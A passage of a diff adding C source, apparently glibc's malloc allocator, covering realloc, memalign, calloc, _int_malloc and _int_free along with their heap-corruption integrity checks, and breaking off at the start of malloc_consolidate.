+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  (void) mutex_lock (&ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  (void) mutex_unlock (&ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    (void) mutex_unlock (&ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    (void) mutex_unlock (&av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp = *fb;
+      do
+        {
+          victim = pp;
+          if (victim == NULL)
+            break;
+        }
+      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
+             != victim);
+      if (victim != 0)
+        {
+          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
+            {
+              errstr = "malloc(): memory corruption (fast)";
+            errout:
+              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
+              return NULL;
+            }
+          check_remalloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          if (victim == 0) /* initialization check */
+            malloc_consolidate (av);
+          else
+            {
+              bck = victim->bk;
+	if (__glibc_unlikely (bck->fd != victim))
+                {
+                  errstr = "malloc(): smallbin double linked list corrupted";
+                  goto errout;
+                }
+              set_inuse_bit_at_offset (victim, nb);
+              bin->bk = bck;
+              bck->fd = bin;
+
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (have_fastchunks (av))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (victim->size > av->system_mem, 0))
+            malloc_printerr (check_action, "malloc(): memory corruption",
+                             chunk2mem (victim), av);
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+                victim->size |= NON_MAIN_ARENA;
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
+                  if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                      while ((unsigned long) size < fwd->size)
+                        {
+                          fwd = fwd->fd_nextsize;
+                          assert ((fwd->size & NON_MAIN_ARENA) == 0);
+                        }
+
+                      if ((unsigned long) size == (unsigned long) fwd->size)
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin &&
+              (unsigned long) (victim->size) >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin) && victim->size == victim->fd->size)
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+                    victim->size |= NON_MAIN_ARENA;
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        (void) mutex_unlock (&av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  mutex_lock(&av->mutex);
+		  locked = 1;
+		  chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    (void)mutex_unlock(&av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      (void)mutex_lock(&av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = p->prev_size;
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      (void)mutex_unlock(&av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
